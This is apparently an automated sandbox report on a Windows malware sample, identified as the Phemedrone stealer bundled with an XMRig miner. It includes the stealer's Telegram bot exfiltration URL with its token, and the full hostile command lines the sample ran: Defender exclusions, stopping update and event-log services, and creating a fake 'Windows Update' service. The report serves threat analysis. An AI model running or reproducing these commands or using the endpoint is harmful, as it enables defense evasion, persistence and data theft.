Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
31-03-2024 11:53
General
-
Target
AutoBuy.exe
-
Size
2.8MB
-
MD5
ec3328cb44fb4e760b5cdef7bbbcd6f6
-
SHA1
d93d74a1200418ec041d4206513d511da870eaec
-
SHA256
ceb1bbd8e4e6d29926c8011524897693a3240a4bda727d309987a6541cd98907
-
SHA512
e33563185221acfaf7352a37555f8b1c4f73a962f4ae96e1dee52e8f034bc416fee22dff8bba698b596576470c0572abcf5e2dea1929f6151aac05678e78ca01
-
SSDEEP
49152:JxppTslWVwj1GowiT4QRW5CX42rZSkvFksV4qBNmP+X:JxpHVwIozyg3jvbVHBNI
Malware Config
Extracted
phemedrone
https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendMessage?chat_id=-4194654645
Signatures
-
Phemedrone
An information and wallet stealer written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 9 IoCs
-
Creates new service(s) 1 TTPs
-
Drops file in Drivers directory 2 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 14 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 20 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe"C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\java2.exe"C:\Users\Admin\AppData\Local\Temp\java2.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\java.exe"C:\Users\Admin\AppData\Local\Temp\java.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "Windows Update"4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "Windows Update" binpath= "C:\ProgramData\Microsoft\update.exe" start= "auto"4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "Windows Update"4⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\vlad.exe"C:\Users\Admin\AppData\Local\Temp\vlad.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\ProgramData\Microsoft\update.exeC:\ProgramData\Microsoft\update.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ksofn4ds.qci.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\java.exeFilesize
2.6MB
MD55dfe953861753222629629ba6121a0bc
SHA1d56d226b950a773d947c7fc42dcff9788a61f4b7
SHA256f23ec1a549bda11f572a2e58f692855a6344bce1ad683ddd730f12342e099975
SHA512aaddb836207c42b6b795ebf8696373d9b4bc56b73cdea47141348955bd49f2d71088d1d97f06813ed5f72b40775c8c25cb23a78048ea4c223e2e4ef7f98d3e2d
-
C:\Users\Admin\AppData\Local\Temp\java2.exeFilesize
2.1MB
MD5fafce5048ad4b205b36844d78f036435
SHA19e310d6e583722889099bc46f1c8821d31881dab
SHA25639a0270fb0a39cbcc11463681a11fdd7146254c306d79f0500775c09b0ee7eea
SHA512c2d9d1462f9cda573cc676fbafa5b093940e8071c80fe866e33dea8b22f8462f6fb688c3eeb9a6d71f0617b6792a04191639c41ada2c5259a0e5291c63b7e39a
-
C:\Users\Admin\AppData\Local\Temp\vlad.exeFilesize
512KB
MD50dd8757d42380787ba7162a7776f30c5
SHA118465ff3c76fc6c441a195b679047f9089b269de
SHA256a6ed050ec8b21feafd3335a3396258be13a2d29601030be8f4b20c682759a2fb
SHA512d0a8354a7af21702f70b5ef7f3440a4755b6e1bb4e39a5c821fcac34e2f019dc73243764ef037efb2ad4de05855ced057d95bc8cdfa1c74ebb27194421297c22
-
C:\Windows\system32\drivers\etc\hostsFilesize
3KB
MD52d29fd3ae57f422e2b2121141dc82253
SHA1c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA25680a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68
-
memory/752-224-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-221-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-218-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-236-0x00000000015B0000-0x00000000015D0000-memory.dmpFilesize
128KB
-
memory/752-219-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-220-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-234-0x00000000015B0000-0x00000000015D0000-memory.dmpFilesize
128KB
-
memory/752-222-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-223-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-233-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-232-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-231-0x0000000001570000-0x00000000015B0000-memory.dmpFilesize
256KB
-
memory/752-230-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-225-0x00000000007A0000-0x00000000007C0000-memory.dmpFilesize
128KB
-
memory/752-226-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-227-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-228-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/752-229-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1264-160-0x00007FFD01680000-0x00007FFD02141000-memory.dmpFilesize
10.8MB
-
memory/1264-95-0x0000000000E60000-0x0000000001080000-memory.dmpFilesize
2.1MB
-
memory/1264-103-0x000000001D0D0000-0x000000001D2EE000-memory.dmpFilesize
2.1MB
-
memory/1264-104-0x000000001CC70000-0x000000001CC80000-memory.dmpFilesize
64KB
-
memory/1264-90-0x00007FFD01680000-0x00007FFD02141000-memory.dmpFilesize
10.8MB
-
memory/1264-164-0x000000001CC70000-0x000000001CC80000-memory.dmpFilesize
64KB
-
memory/2120-214-0x0000000140000000-0x000000014000D000-memory.dmpFilesize
52KB
-
memory/2120-216-0x0000000140000000-0x000000014000D000-memory.dmpFilesize
52KB
-
memory/2120-213-0x0000000140000000-0x000000014000D000-memory.dmpFilesize
52KB
-
memory/2120-211-0x0000000140000000-0x000000014000D000-memory.dmpFilesize
52KB
-
memory/2120-210-0x0000000140000000-0x000000014000D000-memory.dmpFilesize
52KB
-
memory/2120-212-0x0000000140000000-0x000000014000D000-memory.dmpFilesize
52KB
-
memory/3288-1-0x00007FFD01680000-0x00007FFD02141000-memory.dmpFilesize
10.8MB
-
memory/3288-3-0x00000000035B0000-0x00000000035C0000-memory.dmpFilesize
64KB
-
memory/3288-133-0x00007FFD01680000-0x00007FFD02141000-memory.dmpFilesize
10.8MB
-
memory/3288-2-0x000000001C9B0000-0x000000001CC14000-memory.dmpFilesize
2.4MB
-
memory/3288-0-0x0000000000670000-0x000000000094A000-memory.dmpFilesize
2.9MB
-
memory/4140-162-0x000001E3F65D0000-0x000001E3F65E0000-memory.dmpFilesize
64KB
-
memory/4140-168-0x00007FFD01680000-0x00007FFD02141000-memory.dmpFilesize
10.8MB
-
memory/4140-165-0x000001E3F65D0000-0x000001E3F65E0000-memory.dmpFilesize
64KB
-
memory/4140-163-0x000001E3F65D0000-0x000001E3F65E0000-memory.dmpFilesize
64KB
-
memory/4140-161-0x00007FFD01680000-0x00007FFD02141000-memory.dmpFilesize
10.8MB
-
memory/4140-155-0x000001E3F6520000-0x000001E3F6542000-memory.dmpFilesize
136KB
-
memory/4556-196-0x000001F91C410000-0x000001F91C4C5000-memory.dmpFilesize
724KB
-
memory/4556-207-0x00007FFD01680000-0x00007FFD02141000-memory.dmpFilesize
10.8MB
-
memory/4556-204-0x000001F9038C0000-0x000001F9038D0000-memory.dmpFilesize
64KB
-
memory/4556-203-0x000001F91C670000-0x000001F91C67A000-memory.dmpFilesize
40KB
-
memory/4556-202-0x000001F91C660000-0x000001F91C666000-memory.dmpFilesize
24KB
-
memory/4556-201-0x000001F91C630000-0x000001F91C638000-memory.dmpFilesize
32KB
-
memory/4556-200-0x000001F91C680000-0x000001F91C69A000-memory.dmpFilesize
104KB
-
memory/4556-199-0x000001F91C620000-0x000001F91C62A000-memory.dmpFilesize
40KB
-
memory/4556-198-0x000001F91C640000-0x000001F91C65C000-memory.dmpFilesize
112KB
-
memory/4556-197-0x000001F91C4D0000-0x000001F91C4DA000-memory.dmpFilesize
40KB
-
memory/4556-195-0x000001F91C3F0000-0x000001F91C40C000-memory.dmpFilesize
112KB
-
memory/4556-194-0x00007FF4ACF10000-0x00007FF4ACF20000-memory.dmpFilesize
64KB
-
memory/4556-175-0x000001F9038C0000-0x000001F9038D0000-memory.dmpFilesize
64KB
-
memory/4556-174-0x000001F9038C0000-0x000001F9038D0000-memory.dmpFilesize
64KB
-
memory/4556-173-0x00007FFD01680000-0x00007FFD02141000-memory.dmpFilesize
10.8MB
-
memory/4916-149-0x0000000074C70000-0x0000000075420000-memory.dmpFilesize
7.7MB
-
memory/4916-146-0x0000000005F40000-0x0000000005FA6000-memory.dmpFilesize
408KB
-
memory/4916-145-0x00000000055A0000-0x0000000005632000-memory.dmpFilesize
584KB
-
memory/4916-141-0x0000000005780000-0x0000000005790000-memory.dmpFilesize
64KB
-
memory/4916-127-0x0000000074C70000-0x0000000075420000-memory.dmpFilesize
7.7MB
-
memory/4916-99-0x00000000009D0000-0x00000000009EC000-memory.dmpFilesize
112KB